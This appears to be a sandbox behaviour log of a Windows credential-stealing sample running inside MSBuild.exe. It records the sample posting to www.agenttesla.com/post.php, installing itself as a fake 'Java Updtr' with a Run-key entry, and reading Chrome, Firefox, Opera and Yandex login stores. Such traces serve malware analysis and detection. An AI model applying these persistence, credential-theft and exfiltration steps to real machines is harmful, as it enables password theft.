File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 237 True 1
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_attributes True 2
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_type True 2
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 559 True 1
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, size = 4096, size_out = 0 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
System Get Computer Name result_out = XDUWTFONO True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking False 1
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Mutex Create mutex_name = Global\.net clr networking True 9
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
DNS Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
System Get Network Adapter Info - False 1
System Get Network Adapter Info - True 1
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Socket Close type = SOCK_STREAM True 1
Socket Send flags = NO_FLAG_SET, size = 287, size_out = 287 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Inet Read Response size = 4096, size_out = 367 True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
DNS Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Close type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Inet Read Response size = 4096, size_out = 367 True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, type = file_type True 2
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 4096, size_out = 51 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 4096, size_out = 0 True 1
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\, type = file_attributes False 1
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming, type = file_attributes True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData, type = file_attributes True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz, type = file_attributes True 1
File Get Info filename = C:\Users, type = file_attributes True 1
File Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, type = file_attributes True 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe, destination_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = Java Updtr, type = REG_NONE False 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = Java Updtr, data = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 130, type = REG_SZ True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Socket Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Socket Close type = SOCK_STREAM True 1
Socket Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Inet Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Inet Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 225, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Inet Read Response size = 4096, size_out = 367 True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Socket Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Close type = SOCK_STREAM True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 3
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_type True 2
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 18432, size_out = 18432 True 1
Environment Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_type True 2
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 4096, size_out = 111 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 4096, size_out = 0 True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes False 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe.Config, type = file_attributes True 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes False 1
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
